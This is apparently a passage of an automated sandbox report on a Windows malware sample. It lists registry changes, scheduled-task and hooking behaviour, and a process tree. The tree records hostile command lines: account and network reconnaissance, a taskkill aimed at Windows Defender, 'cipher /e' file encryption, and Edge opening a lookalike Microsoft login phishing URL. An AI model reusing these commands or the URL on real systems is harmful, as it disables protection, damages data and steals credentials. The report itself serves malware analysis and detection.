| Set value (str) | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\16\IEFixedFontName = "Vani" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\10\IEFixedFontName = "Kokila" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\29\IEPropFontName = "Gadugi" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\19\IEFixedFontName = "Cordia New" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\32\IEPropFontName = "Times New Roman" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\37\IEFixedFontName = "Leelawadee UI" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\39\IEPropFontName = "Mongolian Baiti" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\7\IEFixedFontName = "Times New Roman" | C:\Windows\SysWOW64\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\10 | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\12\IEPropFontName = "Raavi" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\6\IEFixedFontName = "Courier New" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\8\IEFixedFontName = "Courier New" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\10\IEPropFontName = "Kokila" | C:\Windows\SysWOW64\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\22 | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\34\IEFixedFontName = "Iskoola Pota" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\5\IEFixedFontName = "Courier New" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\24\IEFixedFontName = "MS Gothic" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\3\IEFixedFontName = "Courier New" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\24\IEPropFontName = "MS PGothic" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\27\IEFixedFontName = "Ebrima" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\13\IEPropFontName = "Shruti" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\13\IEFixedFontName = "Shruti" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\8\IEPropFontName = "Times New Roman" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\22\IEPropFontName = "Sylfaen" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\7\IEPropFontName = "Times New Roman" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\28\IEFixedFontName = "Gadugi" | C:\Windows\SysWOW64\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\33 | C:\Windows\SysWOW64\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\38 | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\4\IEFixedFontName = "Courier New" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\9\IEPropFontName = "Times New Roman" | C:\Windows\SysWOW64\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\15 | C:\Windows\SysWOW64\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\29 | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\21\IEFixedFontName = "Microsoft Himalaya" | C:\Windows\SysWOW64\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\30 | C:\Windows\SysWOW64\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\11 | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\3\IEPropFontName = "Times New Roman" | C:\Windows\SysWOW64\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\24 | C:\Windows\SysWOW64\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\25 | C:\Windows\SysWOW64\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\5 | C:\Windows\SysWOW64\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\8 | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\12\IEFixedFontName = "Raavi" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\20\IEFixedFontName = "Leelawadee UI" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\33\IEFixedFontName = "Times New Roman" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\19\IEPropFontName = "Leelawadee UI" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\25\IEPropFontName = "PMingLiu" | C:\Windows\SysWOW64\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\3 | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\30\IEPropFontName = "Microsoft Yi Baiti" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\31\IEFixedFontName = "Times New Roman" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\34\IEPropFontName = "Iskoola Pota" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\16\IEPropFontName = "Vani" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\14\IEFixedFontName = "Kalinga" | C:\Windows\SysWOW64\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\16 | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\20\IEPropFontName = "Leelawadee UI" | C:\Windows\SysWOW64\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\28 | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\31\IEPropFontName = "Times New Roman" | C:\Windows\SysWOW64\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\12 | C:\Windows\SysWOW64\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\6 | C:\Windows\SysWOW64\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\26 | C:\Windows\SysWOW64\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\27 | C:\Windows\SysWOW64\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\37 | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\17\IEFixedFontName = "Tunga" | C:\Windows\SysWOW64\reg.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\Local Settings | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\psiphon | C:\Users\Admin\AppData\Local\Temp\vir_8a698de5-9d46-42fb-81f0-af6d1d940eb3\bloatware\3.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\psiphon\URL Protocol | C:\Users\Admin\AppData\Local\Temp\vir_8a698de5-9d46-42fb-81f0-af6d1d940eb3\bloatware\3.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\psiphon\shell | C:\Users\Admin\AppData\Local\Temp\vir_8a698de5-9d46-42fb-81f0-af6d1d940eb3\bloatware\3.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\psiphon\shell\open | C:\Users\Admin\AppData\Local\Temp\vir_8a698de5-9d46-42fb-81f0-af6d1d940eb3\bloatware\3.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\psiphon\shell\open\command\ = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\vir_8a698de5-9d46-42fb-81f0-af6d1d940eb3\\bloatware\\3.exe\" -- \"%1\"" | C:\Users\Admin\AppData\Local\Temp\vir_8a698de5-9d46-42fb-81f0-af6d1d940eb3\bloatware\3.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\Local Settings | C:\Windows\system32\OpenWith.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\psiphon\ = "URL:psiphon" | C:\Users\Admin\AppData\Local\Temp\vir_8a698de5-9d46-42fb-81f0-af6d1d940eb3\bloatware\3.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\psiphon\shell\open\command | C:\Users\Admin\AppData\Local\Temp\vir_8a698de5-9d46-42fb-81f0-af6d1d940eb3\bloatware\3.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\Local Settings | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\Local Settings | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\Local Settings | C:\Windows\system32\OpenWith.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\Local Settings | C:\Windows\SysWOW64\cmd.exe | N/A |
Runs net.exe
Runs ping.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\PING.EXE | N/A |
| N/A | N/A | C:\Windows\SysWOW64\PING.EXE | N/A |
| N/A | N/A | C:\Windows\SysWOW64\PING.EXE | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
| N/A | N/A | C:\Windows\SysWOW64\PING.EXE | N/A |
| N/A | N/A | C:\Windows\SysWOW64\PING.EXE | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
| N/A | N/A | C:\Windows\SysWOW64\PING.EXE | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
Runs regedit.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\regedit.exe | N/A |
Scheduled Task/Job: Scheduled Task
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SYSTEM32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\schtasks.exe | N/A |
Suspicious behavior: AddClipboardFormatListener
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\VideoLAN\VLC\vlc.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\VideoLAN\VLC\vlc.exe | N/A |
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\vir_8a698de5-9d46-42fb-81f0-af6d1d940eb3\bloatware\3.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\vir_8a698de5-9d46-42fb-81f0-af6d1d940eb3\bloatware\3.exe | N/A |
| N/A | N/A | C:\Program Files\VideoLAN\VLC\vlc.exe | N/A |
| N/A | N/A | C:\Windows\system32\OpenWith.exe | N/A |
| N/A | N/A | C:\Windows\system32\OpenWith.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Users\Admin\AppData\Local\Temp\vir.exe
"C:\Users\Admin\AppData\Local\Temp\vir.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\vir_8a698de5-9d46-42fb-81f0-af6d1d940eb3\!main.cmd" "
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /K spread.cmd
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /K doxx.cmd
C:\Windows\SysWOW64\PING.EXE
ping google.com -t -n 1 -s 4 -4
C:\Windows\SysWOW64\xcopy.exe
xcopy 1 C:\Users\Admin\Desktop
C:\Windows\SysWOW64\ipconfig.exe
ipconfig
C:\Windows\SysWOW64\xcopy.exe
xcopy 2 C:\Users\Admin\Desktop
C:\Windows\SysWOW64\net.exe
net accounts
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 accounts
C:\Windows\SysWOW64\xcopy.exe
xcopy 3 C:\Users\Admin\
C:\Windows\SysWOW64\net.exe
net user
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 user
C:\Windows\SysWOW64\tasklist.exe
tasklist /apps /v /fo table
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im WindowsDefender.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /K handler.cmd
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://https-login--microsoftonline--com.httpsproxy.net/common/reprocess?ctx=rQQIARAAhZI7b9tmFED1sOUH2tpIi6IBOjhFh6IppU98SgYykCZDSRZJW3xY5CKQFCU-RVokRZFjl2RMlg4BshToYrRA0S5FG7SZPRhBhg7JP_AQFB0Kb42SzEaWi3twz3bP9iZeR9A6qIOvq3Ad7H-JEjiGopgBIbCJQ2jbAFALsXCoOW4jqxNM4KY-v7G9i-78f4He2iD_ePzfk3vPf5TPynt2kkTxfqORZVk9nEwc06qbYdDw9dnYmU0X8G_l8rNy-VFl3ZpBsnhWiXGkhcJNFGmBFsDaTQKH65zb8wRJbWoBk_Cul_M5AHwxsPvSNOfoaaIGXUyVGJSXNFujuaXA9hy1kFcOmXC02VRXPif5K98PBLabqK5XaPQxrAWaL9Ac9qKyI5BpYsNvRjh3CuvfytYknAejKIyTR9XvKoGro8xdDerJTJDKBVpkA3HQQxkptBTACrQWELhCGxZNePmSF8BEyn3F7rQ0KOCXrLqQj6kxnlMCCVEpaaUDKj_tKzOJ6BkeTSnDUetQtPsTxE1OTN1gjcg-POpSQ4ykAsZkMX45UsQCCU_5JZeTkD8vIN1dmrSWGJno6EfQMmMD21UOID81JddwLSocRJMoPvRswVPmTtA9WQCP46dSMHdka44OOUk7SY_jTFmQTCcba0LsQDMePZ0NxU6XUJnIwMBowJLNaS_MME4FqLhoH6Xs8YA2AacL_QwLs7PqzWveu4B_qdZWSxDOzqtEGFkzZ7wXzcOJ41vXJbGAG8Jb6oSBVSd9_9la-XLt083a7heflfZKX30CqvubK6q-oau18vfrq-Ie_nr558W3Nw9-euJ-_vCELZ2vN1zR6cSnlNVQ1Wnum32xKJZ3Va7X16c8OwAm65q9NB22iNvynfZ-80Gt_KBWO69tdekRz0j4CPxTq93fKP2-9d52X3zw8fZ26oz80NR9K77xruGnH5auPnr5198XPzy-_6pzufONeVuOnDFsZIJCTaX2kJOLlCQbrkCQzpF0wCBa4VHDIkTG8Z2fd0uvAQ2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff93f1046f8,0x7ff93f104708,0x7ff93f104718
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /K cipher.cmd
C:\Users\Admin\AppData\Local\Temp\vir_8a698de5-9d46-42fb-81f0-af6d1d940eb3\Rover.exe
Rover.exe
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument C:\Users\Admin\AppData\Local\Temp\vir_8a698de5-9d46-42fb-81f0-af6d1d940eb3\web.htm
C:\Users\Admin\AppData\Local\Temp\vir_8a698de5-9d46-42fb-81f0-af6d1d940eb3\Google.exe
Google.exe
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ff93f1046f8,0x7ff93f104708,0x7ff93f104718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2128,12144610200884549989,8085597660636832337,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2140 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2128,12144610200884549989,8085597660636832337,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2192 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2128,12144610200884549989,8085597660636832337,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2692 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,12144610200884549989,8085597660636832337,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3136 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,12144610200884549989,8085597660636832337,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3148 /prefetch:1
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1564,9935317460879055041,7039101043739041263,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2112 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,12144610200884549989,8085597660636832337,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3976 /prefetch:1
C:\Windows\SysWOW64\cipher.exe
cipher /e
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,12144610200884549989,8085597660636832337,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5252 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,12144610200884549989,8085597660636832337,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4620 /prefetch:1
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\vir_8a698de5-9d46-42fb-81f0-af6d1d940eb3\helper.vbs"
C:\Windows\system32\efsui.exe
efsui.exe /efs /keybackup
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
